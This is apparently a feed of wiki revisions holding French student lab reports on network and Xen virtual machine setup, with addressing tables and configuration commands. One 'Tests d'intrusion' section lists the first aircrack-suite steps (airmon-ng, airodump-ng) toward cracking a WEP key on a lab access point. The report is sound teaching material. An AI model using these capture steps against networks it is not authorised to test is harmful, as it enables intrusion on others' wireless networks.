 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.188&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 !iface eth0 inet6 auto &lt;br /&gt;
&lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56249</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56249"/>
				<updated>2021-10-25T15:06:51Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
 &amp;gt; 		  'phy:/dev/storage/Paixdieu1,xvda3,w',&lt;br /&gt;
 &amp;gt; 		  'phy:/dev/storage/Paixdieu2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
  &amp;gt;vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56245</id>
		<title>TP sysres IMA5sc 2021/2022</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56245"/>
				<updated>2021-10-25T15:04:29Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]&lt;br /&gt;
| Andrei Florea / Julien Delabre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]&lt;br /&gt;
| Robin Lasserye / Aviran Tetia &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]&lt;br /&gt;
| Axel Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]&lt;br /&gt;
| Selim Raphael&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]&lt;br /&gt;
| Helene Camille&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]&lt;br /&gt;
| Boris JACQUOT / Louis WADBLED&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]&lt;br /&gt;
| Johnny Gouvaert / Arthur Vercaemst&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]&lt;br /&gt;
| Mel Theo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]&lt;br /&gt;
| Khalil Alvare&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]&lt;br /&gt;
| Souleyman Enoch&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]&lt;br /&gt;
| Clément&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 (SR52) !!SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B1::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B2::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B3::0/64 || 10.03.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B4::0/64 || 10.04.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || Duff&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B5::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B6::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B7::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || RinceCochon&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B8::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Souleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B9::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || Panache&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60BA::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || Corona&lt;br /&gt;
|-&lt;br /&gt;
| INTERCO || 531 || 192.168.222.40/29 ||  || || 192.168.222.43/29 || 192.168.222.43/29 || 192.168.222.44/29 ||  || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| XEN || 42 || 193.48.57.160/28 || 2001:7A8:116E:60BF::0/64 || 193.48.57.190/28 2001:7A8:116E:60B0::F3/64 || 193.48.57.187/28 2001:7A8:116E:60B0::F0/64|| 193.48.57.188/28 2001:7A8:116E:60B0::F1/64 || 192.48.57.189/28 2001:7A8:116E:60B0::F2/64|| || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Souleyman / Enoch || 193.48.57.185/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
!--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Architecture réseau=&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56232</id>
